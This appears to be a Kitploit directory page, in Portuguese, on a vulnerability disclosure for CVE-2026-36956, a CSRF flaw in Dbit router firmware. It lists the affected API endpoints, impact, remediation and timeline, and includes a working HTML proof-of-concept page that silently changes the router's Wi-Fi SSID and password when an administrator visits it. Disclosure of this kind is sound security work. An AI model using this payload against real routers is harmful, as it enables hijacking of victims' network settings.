Skip to content
KitploitKITPLOIT
FerramentasBlog
Log in
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

FeedsContatoPrivacidade© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-36956 — Prova de conceito para CVE-2026-36956, uma vulnerabilidade de CSRF no firmware do roteador Dbit que permite alterações de configuração não autorizadas por meio de requisições forjadas. | Kitploit
Ferramentas/GitHubGitHub/kirubel-cve/cve-2026-36956
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebSegurança WebTestes de Penetração
GitHubkirubel-cve/cve-2026-36956

CVE-2026-36956

Prova de conceito para CVE-2026-36956, uma vulnerabilidade de CSRF no firmware do roteador Dbit que permite alterações de configuração não autorizadas por meio de requisições forjadas.

Ver Repositório
6há 5 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2026-36956: Cross-Site Request Forgery (CSRF) na Interface de Gerenciamento Web

ID CVE: CVE-2026-36956 Data: 2026-04-29 Descobridor: Kirubel Solomne Fornecedor: Shenzhen Dibit Network Equipment Co., Ltd. Produto: Roteador Dbit Versão do Firmware: V1.0.0 CWE: CWE-352 - Cross-Site Request Forgery (CSRF)


Descrição

O firmware V1.0.0 do roteador Dbit não implementa mecanismos de proteção contra CSRF, como tokens anti-CSRF ou validação estrita de Origin/Referer nos endpoints administrativos da API. Um atacante pode criar uma página da web maliciosa que envia solicitações HTTP forjadas para endpoints de configuração. Se um administrador autenticado visitar a página maliciosa, o roteador processa a solicitação forjada como uma ação administrativa legítima.


Pontuação CVSS

Pontuação CVSS v3.1: 8.8 (Alta) CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

MétricaValor
Vetor de AtaqueRede
Complexidade do AtaqueBaixa
Privilégios NecessáriosNenhum
Interação do UsuárioNecessária
Impacto na ConfidencialidadeAlto
Impacto na IntegridadeAlto
Impacto na DisponibilidadeAlto

Endpoints Afetados

EndpointFunção
/api/setWlanConfiguração da rede sem fio (SSID, senha)
/api/setWanConfiguração da WAN
/api/setSystemConfiguração do sistema

Prova de Conceito

Salve o seguinte como poc.html e abra-o enquanto um administrador estiver conectado ao roteador:

<!DOCTYPE html>
<html>
<body>
<script>
  fetch('http://192.168.10.1/api/setWlan', {
    method: 'POST',
    credentials: 'include',
    headers: { 'Content-Type': 'application/json' },
    body: JSON.stringify({
      ssid: "Hacked_Network",
      password: "attacker123"
    })
  });
</script>
</body>
</html>

Comportamento Esperado: A solicitação deve ser rejeitada devido à incompatibilidade do token CSRF. Comportamento Real: O roteador aceita e processa a solicitação forjada.


Impacto

  • Modificação não autorizada do SSID e da senha do WiFi
  • Alterações na configuração da WAN/DNS
  • Negação de serviço para usuários legítimos
  • Assunção total da configuração do roteador

Remediação

  • Implementar tokens anti-CSRF em todos os endpoints que alteram o estado
  • Aplicar validação estrita dos cabeçalhos Origin e Referer
  • Usar o atributo de cookie SameSite=Strict para cookies de sessão

Cronograma de Divulgação

DataEvento
2026-04-29Vulnerabilidade descoberta
2026-04-29Relatada à MITRE
2026-04-29CVE-2026-36956 atribuído
2026-04-29Divulgação pública

Referências

  • MITRE CVE-2026-36956
  • CWE-352
  • Site do Fornecedor
Baixar ferramenta